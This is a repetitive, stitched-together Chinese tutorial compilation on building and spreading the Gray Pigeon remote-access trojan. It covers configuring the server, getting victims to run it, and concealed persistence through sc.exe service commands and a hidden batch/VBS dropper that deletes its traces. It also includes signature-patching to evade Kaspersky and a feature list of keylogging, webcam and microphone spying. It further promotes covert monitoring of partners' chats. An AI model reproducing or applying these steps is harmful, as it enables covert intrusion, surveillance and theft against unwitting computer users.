下载文档原格式
中国远程控制的佼佼者,黑客手中的得意兵刃,也是令杀毒厂商倍加头疼的首要通缉对象……
这种种造就了众人皆知的灰鸽子
今天,就让我们来研究一下这个厉害的软件
废话少说,现在开始
1.首先打开灰鸽子的主程序,是下图所示
(灰鸽子黑防专版使用教程)
2.点击自动上线,可以看到如下界面,来配置鸽子的上线地址(FTP/3322/花生壳都行)
3.将空间地址密码和自己的IP地址添好后,
更新
4.接下来配置服务端,点击图1的配置服务
端
第一个红圈内填自己刚更新的IP网页路径第二个填自己的密码(连接服务器时要用,
可不填
5.安装项一般可按默认,但自动删除一般需
选,否则被人家发现了,哈哈
(
6.
此项一般可按默认,可根据自己需要设定
7.下面两个最好都勾上,如果要自己作免
杀,就要选不加壳
8.最后点生成服务器就行了,
9.这时你只要将自己生成的木马给别人运
行就可以了,这样他就会上线如下图
如果设了密码就要输入连接密码哦
10.这时有人可能会说,我按你说的怎么没有上线呢,那么可能你是内网,需要断口映
射的
这时你可选择菜单里的内网端口映射
一切按照默认旧可以,点击生成
11.将生成的那个程序给一个在外网的电脑运行(至于用什么办法让他运行就要发挥自
己的聪明才智了)
运行后将这台电脑的IP输入VPortW服务端IP,然后依次点连接,映射就OK拉
12.
这次再将IP更新到网页上去,记住是那台
外网电脑的IP
这下子上线就没问题拉。
灰鸽子远程控制教程灰鸽子远程控制,著名木马灰鸽子远程控制工具,附带中文版键盘记录,多功能图标修改器等!准备工具:鸽子服务端IcoSprite图标更改器;SC.exe服务添加删除更改工具;winrar程序特点:自解压形式,双击即可制作过程:1. 首先自己配置一下鸽子服务端,配置时[启动项设置]这里面的都不要填,不要写入注册表,也不要用服务启动。
其他的随你个人爱好。
2.用SC创建一个服务运行CMD.EXE 在system32的目录下运行执行SC.exe create huigezi BinPath= "%systemroot%\system32\gezi.exe" type=own type= interact start= auto DisplayName= "gezi"‘这句是用SC建立一个服务,服务名为huigezi,路径Binpath为"%systemroot%\system32\gezi.exe",类型type为own 与interact交互,启动类型start为自动,显示名DisplayName为"gezi"。
sc.exe descript_ion huigezi "不死鸽子"‘这句是将huigezi服务的描述改为“不死鸽子”sc config wuauserv depend= huigezi‘配置huigezi使wuauserv服务依存此服务(wuauserv可以根据自己喜欢改成其它服务,这里的wuauserv是系统在Windows Update网站的自动更新服务)。
这里的目的是迷惑管理员,使其不敢轻易停止我们生成的服务,自己也可以多加点。
3.将这些从注册表导出,我个人经验是:瑞星,咔吧等的注册表监控不会对导入注册表报警. 我们将他命名为1.reg4.创建一个BAT文件,并命名为update.bat@regedit /s %systemroot%\system32\1.reg@%systemroot%\system32\gezi.exe@del /q /f /s %systemroot%\system32\1.reg@del /q /f /s %systemroot%\system32\Update.vbs@del /q /f /s %systemroot%\system32\Update.bat5.创建一个vbs并命名为update.vbs目的是为了作用是令bat里的内容以安静模式执行,这样就可以让cmd窗口跳出来了,增加了不少隐蔽性。
灰鸽子远程控制完整详细教程(考虑到灰鸽子技术性较强和传插黑客技术要低调,将网络人远程控制教程放第一部份,灰鸽子教程放在了文章后面第二部份,请大家耐心观看)第一部份:网络人远程监控软件Netman监控版详细安装方法:1.要实现远程监控控制,双方都要安装Netman监控版,双方电脑的安装方法一样,控制端同时也是被控端,只要知道ID和密码,双方可以互相控制。
2.下载软件解压缩后,双击“Netman监控版.EXE”,软件默认安装路径为“C:\Program Files\Netman”,可以自己修改,但安装路径需要记住,因为启动软件桌面上不会新建快捷方式,需要自己进入安装文件夹,双击iexplore.exe启动软件,这时会弹出一个提示窗口,问是否要让软件随系统启动,通常直接点“确定”。
3.完成以上操作后,再按ctrl+y即可呼出软件主界面。
监控版必须使用会员登录才能实现监控功能,所以呼出主界面后,应点击免费注册会员。
4.注册好会员后,点“选项”-“会员登录”,填上注册好的会员号。
5.第一次使用会员登录时,会弹出“设置控制密码”选项,需要注意的是,这里修改的不是前面填写的“登录密码”,而是从其他电脑连接本电脑时需要输入的“控制密码”。
很多用户会误以为这里是修改“登录密码”,导致第二次使用会员登录时,发现登录密码不正确。
出于安全考虑,网络人设置了“登录密码”与“控制密码”两道密码保护,“登录密码”用于登录会员ID,“控制密码”则是其他电脑想要控制本地电脑时所需要填写的密码。
想要修改这两个密码,可点击“选项”-“修改密码”。
6.设置好密码密码后,点右上角的关闭按扭,软件就会在后台运行,桌面上看不到任何图标和提示。
想要再次操作软件,请按下ctrl+y键。
右上角的关闭按扭只是将软件界面关闭,想要彻底退出软件,应点击左上角的“文件”-“退出”。
很多用户想要卸载软件时,发现无卸载,就是因为没有退出程序造成。
7.有同样的方法在另一台电脑安装Netman监控版并使用另一个会员登录,在“远程IP/ID”处输入对方的会员ID和控制密码,点击“连接”即可连接远程电脑。
黑客入侵:灰鸽子2011使用教程(图解)写在前面:现在灰鸽子是越来越困难了,查杀太严重,新手基本上很难捉到鸡,建议如果只是想监控男女朋友QQ聊天记录的新手,直接购买网络人远程控制软件软件,非常好用的一款监控软件,免杀做得很好,鸽子其实不是免费的,空间也是收费的。
没必要浪费时间)灰鸽子教程准备工具:鸽子服务端IcoSprite图标更改器;SC.exe服务添加删除更改工具;winrar程序特点:自解压形式,双击即可制作过程:1. 首先自己配置一下鸽子服务端,配置时[启动项设置]这里面的都不要填,不要写入注册表,也不要用服务启动。
其他的随你个人爱好。
运行CMD.EXE 在system32的目录下运行执行SC.exe create huigezi BinPath= "%systemroot%\system32\gezi.exe" type=own type= interact start= auto DisplayName= "gezi"‘这句是用SC建立一个服务,服务名为huigezi,路径Binpath为"%systemroot%\system32\gezi.exe",类型type为own 与interact交互,启动类型start为自动,显示名DisplayName为"gezi"。
sc.exe descript_ion huigezi "不死鸽子"‘这句是将huigezi服务的描述改为“不死鸽子”sc config wuauserv depend= huigezi‘配置huigezi使wuauserv服务依存此服务(wuauserv可以根据自己喜欢改成其它服务,这里的wuauserv是系统在Windows Update网站的自动更新服务)。
这里的目的是迷惑管理员,使其不敢轻易停止我们生成的服务,自己也可以多加点。
灰鸽子使用教程灰鸽子如何使用?
导读:灰鸽子是一款远程控制软件,不过这款软件刚推出的时候是定义为公司和家庭管理的软件,由于软件设计存在缺陷,被黑客恶意使用,使得这款软件被定义为木马程序。
下面给大家介绍灰鸽子的使用教程。
1、先下载灰鸽子软件,大家没有的可以下载灰鸽子软件的;
2、打开后灰鸽子,我们先点击ftp更新我们的动态域名;
3、更新成功在打开配置服务端,写上更新好的域名;
4、这里是运行后服务端释放的目录,大家根据自己的要求来写;
5、这个是选择用什么进程的名字,我这个是使用ie进程;
6、配置好后,就是有一个Server.exe,运行后就可以在主控端里面看到了;
7、主控端显示的界面就是这样的;
灰鸽子这款软件本身是不具备传播性的,一般是他人通过捆绑的方式进行传播,传播方式有网页传播、邮件传播、IM聊天工具传播、非法软件传播。
教程之灰鸽子VIP2006终极免杀技术-电脑资料这次给大家做一个过各种杀毒软件的免杀教程,。
这次教程主要以灰鸽子VIP2006服务端为例!现在网上很多免杀教程,我也看过很多,但是免杀效果都不是很好,用不几天就被杀了,所以真正免杀的鸽子,还是修改杀毒软件的特征码。
这样免杀效果才更好,能达到长期免杀。
今天这节课主要给大家讲过卡巴内存免杀和外表免杀,达到总体免杀,只要你学会了这种方法,以后自己做属于自己的DIY免杀鸽子就可以啦!好了废话不多说了,大家就好好看我操作吧!这是我已经生成好的VIP2006服务端,下面我们开始把服务端的需要做免杀的DLL导出来!这就是鸽子VIP2006服务端程序.exe→MAINDLL.dll→GETKEY.dll 大家看到了吧,2006少了一个hook.dll文件。
以前VIP2005里有HOOK。
DLL文件,现在2006里没有拉!这样做免杀就方便了一些!我们先把卡巴病毒库升级到最新的,然后在用卡巴查一下我们需要做免杀的这3个文件。
看到了吧,都被列为黑名单了。
介绍一下卡巴的威力吧,卡巴我个人感觉是现在杀毒软件最牛的啦。
呵呵不做广告啦。
我们先做GETKEY。
DLL也就是键盘记录钩子。
下面看我操作吧,先来一次大定位,第一次先定位5秒1000字节吧,只要是被报毒的,我们就选择。
然后进行第2次定位,5秒32字节,看好我的操作哦,别忘了删掉上次定位的。
好保存结果,然后再来一次详细的8字节定位,这样能提高免杀效率。
OK定位搞顶啦,然后我们去用C32工具来修改特征码可以用大小写修改法,也可以用跳转法,具体用什么,我们先去看看吧。
看到了吧,有字母,那我们就用UE来该大小写字母吧,我们来杀下毒吧,文件不报毒了,看看内存呢,用OLB载入内存。
被杀了,说明定位的还是不够准,那咱在来一次详细准确的4字节定位,呵呵,看来还有个来,继续。
OK最后一次详细定位结果出来啦,我们去保存一下。
我们来分析一下结果吧,第一个大小60吧,下面的都一样吧,那我们就来选择第一个,去修改特征码,用跳转法,看我操作吧,用C32工具,找到0000B1CA大概就是这里拉,大家如果不懂16进制的话,可以找UE 看哦,继续,我们把这段NOP掉,然后去下面找到程序空隙,也就是0000区吧:0000B1CB: 68 E4BE4000 PUSH 40BEE40000B1D0: E8 A7FBFFFF CALL 0000AD7C--------------------------------------------------0000B1D5新入口点 JMP 0000B916 也就是返回上面的意思吧呵呵不好意思这里因该JMP 0000B1D5 OK保存一下,我们来查下毒吧,文件不报警拉,我们内存查杀,因该找到我们刚刚保存的那个DLL,OK内存已经免杀了,我们现在看看导回服务端能不能上线。
灰鸽子远程控制完整详细教程(考虑到灰鸽子技术性较强和传插黑客技术要低调,将网络人远程控制教程放第一部份,灰鸽子教程放在了文章后面第二部份,请大家耐心观看)第一部份:网络人远程监控软件Netman监控版详细安装方法:1.要实现远程监控控制,双方都要安装Netman监控版,双方电脑的安装方法一样,控制端同时也是被控端,只要知道ID和密码,双方可以互相控制。
2.下载软件解压缩后,双击“Netman监控版.EXE”,软件默认安装路径为“C:\Program Files\Netman”,可以自己修改,但安装路径需要记住,因为启动软件桌面上不会新建快捷方式,需要自己进入安装文件夹,双击iexplore.exe启动软件,这时会弹出一个提示窗口,问是否要让软件随系统启动,通常直接点“确定”。
3.完成以上操作后,再按ctrl+y即可呼出软件主界面。
监控版必须使用会员登录才能实现监控功能,所以呼出主界面后,应点击免费注册会员。
5.第一次使用会员登录时,会弹出“设置控制密码”选项,需要注意的是,这里修改的不是前面填写的“登录密码”,而是从其他电脑连接本电脑时需要输入的“控制密码”。
很多用户会误以为这里是修改“登录密码”,导致第二次使用会员登录时,发现登录密码不正确。
出于安全考虑,网络人设置了“登录密码”与“控制密码”两道密码保护,“登录密码”用于登录会员ID,“控制密码”则是其他电脑想要控制本地电脑时所需要填写的密码。
想要修改这两个密码,可点击“选项”-“修改密码”。
6.设置好密码密码后,点右上角的关闭按扭,软件就会在后台运行,桌面上看不到任何图标和提示。
想要再次操作软件,请按下ctrl+y键。
右上角的关闭按扭只是将软件界面关闭,想要彻底退出软件,应点击左上角的“文件”-“退出”。
很多用户想要卸载软件时,发现无卸载,就是因为没有退出程序造成。
7.有同样的方法在另一台电脑安装Netman监控版并使用另一个会员登录,在“远程IP/ID”处输入对方的会员ID和控制密码,点击“连接”即可连接远程电脑。
灰鸽子使用教程图解(考虑到灰鸽子技术性较强和传插黑客技术要低调,将网络人远程控制教程放第一部份,灰鸽子教程放在了文章后面第二部份,请大家耐心观看)第一部份:网络人远程监控软件网络人远程控制个人版分为Netman办公版与Netman监控版。
两个版本主要区别在于:Netman办公版连接远程电脑时,对方会弹出提示,知道电脑正在远程连接,主要用于个人远程控制、远程办公、远程协助和远程桌面连接等方面使用,是一款免费的远程控制软件;Netman监控版使用会员登录后再连接,远程电脑无任何提示,对方不会发觉,主要用于监管孩童电脑,掌握孩子上网情况,保护孩子健康上网。
Netman监控版详细安装方法:1.要实现远程监控控制,双方都要安装Netman监控版,双方电脑的安装方法一样,控制端同时也是被控端,只要知道ID和密码,双方可以互相控制。
2.下载软件解压缩后,双击“Netman监控版.EXE”,软件默认安装路径为“C:\Program式,需要自己进入安装文件夹,双击iexplore.exe启动软件,这时会弹出一个提示窗口,问是否要让软件随系统启动,通常直接点“确定”。
3.完成以上操作后,再按ctrl+y即可呼出软件主界面。
监控版必须使用会员登录才能实现监控功能,所以呼出主界面后,应点击免费注册会员。
4.注册好会员后,点“选项”-“会员登录”,填上注册好的会员号。
5.第一次使用会员登录时,会弹出“设置控制密码”选项,需要注意的是,这里修改的不是前面填写的“登录密码”,而是从其他电脑连接本电脑时需要输入的“控制密码”。
很多用户会误以为这里是修改“登录密码”,导致第二次使用会员登录时,发现登录密码不正确。
出于安全考虑,网络人设置了“登录密码”与“控制密码”两道密码保护,“登录密码”用于登录会员ID,“控制密码”则是其他电脑想要控制本地电脑时所需要填写的密码。
想要修改这两个密码,可点击“选项”-“修改密码”。
6.设置好密码密码后,点右上角的关闭按扭,软件就会在后台运行,桌面上看不到任何图标和提示。
想要再次操作软件,请按下ctrl+y键。
右上角的关闭按扭只是将软件界面关闭,想要彻底退出软件,应点击左上角的“文件”-“退出”。
很多用户想要卸载软件时,发现无卸载,就是因为没有退出程序造成。
7.有同样的方法在另一台电脑安装Netman监控版并使用另一个会员登录,在“远程IP/ID”处输入对方的会员ID和控制密码,点击“连接”即可连接远程电脑。
优化连接速度。
通常不建议选择“中转”,因为连接速度正常时,选上反而会使得速度变慢。
在没选择的情况下,软件会根据网络状况,自行判断是否通过服务器中转。
软件还有许多设置选项,在不了解功能的情况下,不要随意修改。
第二部份:灰鸽子教程准备工具:鸽子服务端IcoSprite图标更改器;SC.exe服务添加删除更改工具;winrar程序特点:自解压形式,双击即可制作过程:1. 首先自己配置一下鸽子服务端,配置时[启动项设置]这里面的都不要填,不要写入注册表,也不要用服务启动。
其他的随你个人爱好。
2.用SC创建一个服务运行CMD.EXE 在system32的目录下运行执行SC.exe create huigezi BinPath= "%systemroot%\system32\gezi.exe" type=own type= interact start= auto DisplayName= "gezi"‘这句是用SC建立一个服务,服务名为huigezi,路径Binpath为"%systemroot%\system32\gezi.exe",类型type为own 与interact交互,启动类型start为自动,显示名DisplayName为"gezi"。
sc.exe descript_ion huigezi "不死鸽子"‘这句是将huigezi服务的描述改为“不死鸽子”sc config wuauserv depend= huigezi‘配置huigezi使wuauserv服务依存此服务(wuauserv可以根据自己喜欢改成其它服务,这里的wuauserv是系统在Windows Update网站的自动更新服务)。
这里的目的是迷惑管理员,使其不敢轻易停止我们生成的服务,自己也可以多加点。
3.将这些从注册表导出,我个人经验是:瑞星,咔吧等的注册表监控不会对导入注册表报警. 我们将他命名为1.reg4.创建一个BA T文件,并命名为update.bat@regedit /s %systemroot%\system32\1.reg@%systemroot%\system32\gezi.exe@del /q /f /s %systemroot%\system32\1.reg@del /q /f /s %systemroot%\system32\Update.vbs@del /q /f /s %systemroot%\system32\Update.bat5.创建一个vbs并命名为update.vbs目的是为了作用是令bat里的内容以安静模式执行,这样就可以让cmd窗口跳出来了,增加了不少隐蔽性。
里面写上如下代码:On Error Resume Nextset wshshell=createobject ("wscript_.shell")a=wshshell.run ("cmd.exe /C %systemroot%\system32\Update.bat", 0, TRUE)6.用我门配置出来的服务端,并命名为run.exe,用run.exe做一个自解压文件,并命名为gezi.exe.。
记得将解压模式为全部隐藏.解压后运行run.exe,当然你的服务端要自己做免杀,这里我就不多说了。
八仙过海....7.将gezi.exe 1.reg Update.vbs Update.bat 再用winrar制作一个自解压文件,解当然解压模式依旧全部隐藏,替换同名文件现在用rar捆绑出来的文件很多杀软都不杀,你也可以用系统自带的捆绑机,或其他的捆绑机这个方法可以用到其他的木马中捆出来的自解压文件也可以自己再加工:去掉右键用"winrar打开"灰鸽子第一章:软件相关介绍:灰鸽子[VIP 专业版]1.只用一个端口来传输所有通讯数据!普通同类软件都用到了两个或两个以上的端口来完成!2.支持可以控制Internet连接共享、HTTP透明代理上网的电脑!软件智能读取系统设定的代理服务器信息,无需用户设置!3.无需知道服务端IP,自动上线功能让服务端自动上线报道!灰鸽子专用的上线系统无需您注册免费域名才能使用,同时也提供了备用上线方式,在我们的专用上线系统出现故障时,您可以使用备用上线方式来使用自动上线功能。
在使用专用上线系统时,你还可以控制远程电脑通过Socks5代理来中转自动上线。
4.自动上线可以在第一次设置分组,自定义上线图像,上线备注等,这样都可以让你轻而易举的找到目标主机,同时设置连接密码保证了服务主机的安全性!同时具用牵手版的搜a.从主机窗口筛选:可以列出只有某个窗口的一批主机,可以轻松找到哪些人在玩某个游戏!b.从主机进程筛选:可以列出运行了某个程序的一批主机,例如QQ.exe,就可以找到打开了QQ的自动上线主机有哪些了!5.文件管理:管理远程电脑的文件系统,支持复制、粘贴、删除,断点下载、上传文件或文件夹,文件内容均以加密方式传输,确保通讯的安全性.6.远程控制命令:包括远程系统信息、剪切板信息、进程管理、窗口管理、键盘记录、服务管理、管理管理、MS-DOS模拟、代理服务控制!7.注册表编辑器:可以像操作本机注册表一样的编辑远程注册表。
8.常用命令广播,让你控制主机众多主机更多的方便!详细的在线主机线表显示了:主机IP地址,地址位置,电脑名称,系统版本,备注等信息,9.除了具有语音监听、语音发送,还有远程视频监控功能,只有远程计算机有摄像头,且正常打开没有被占用,那么你可以看到,远程摄像头捕获的图片!还可以把远程摄像头捕获的画面存为Mpeg-1格式.远程语音也可以录制成Wav声音文件。
10.可以设置服务端开放Socks5代理服务器功能和HTTP代理服务功能!无需第三方软件支持!支持Windows9x/ME/2000/Xp/2003。
11.软件附带有四款实用工具:a. EXE工具: 可以修改任何EXE文件图标,支持真彩色!b. 内网端口映射器:它允许你将局域网内的服务映射到internet上,使你在局域网内部也能使用自动上线功能!c. FTP服务器: 可以开本机FTP服务!d. Web服务器:可以建立一个简单的Web服务器!12.服务端程序在Windows 2000 / xp / 2003 可以以服务启动,支持发送多种组合键,比如:Ctrl+Alt+del等等,适用于管理服务器主机!远程屏幕捕获还可以录制为Mpeg-1文件格式.13.全中文友好操作界面,让你一目了然,漂亮皮肤让使用时也倍感亲切!功能简单介绍:【1】对远程计算机文件管理:模枋Windows 资源管理器,可以对文件进行复制、粘贴、删除,重命名、远程运行等,可以上传下载文件或文件夹,操作简单易用。
【2】远程控制命令:查看远程系统信息、剪切板查看、进程管理、服务管理、共享管理!【3】捕获屏幕:不但可以连继的捕获远程电脑屏幕,还能把本地的鼠标及键盘传动作送到远程实现实时控制功能!【4】视频语音,可以监控远程摄像头,还有语音监听和发送功能,可以和远程主机进行语音对话!【5】telnet(超级终端).【6】注册表模拟器:远程注册表操作就像操作本地注册表一样方便!【7】命令广播:可以对自动上线主机进行命令广播,如关机、重启、打开网页,筛选符合条件的机等,点一个按钮就可以让N台机器同时关机或进行其它操作!【8】服务端以服务方式启动,支持发送多种组合键,可以轻松管理远程服务器!【9】专用的自动上线系统,直接使用灰鸽子注册ID即可实现远程服务端自动上线!【10】多种自动上线方式:专用上线、DNS解析域名、固定IP等,用户自由选择!注册灰鸽子软件后享有:⒈享用软件的所有功能,没有任何限制!⒉能使用对应的灰鸽子注册版本,能得到此版后期修正的正式版本!⒊可以使用我们的专用上线系统,无需其它域名和空间支持!⒋得到我们更好的技术服务!注:[VIP版] 包括VIP2005、V ersion 1.2、V ersion 2.0 ![企业版]用户只能使用企业版!不能使用其它版本!5.加入会员后,会自动加入官方论坛。
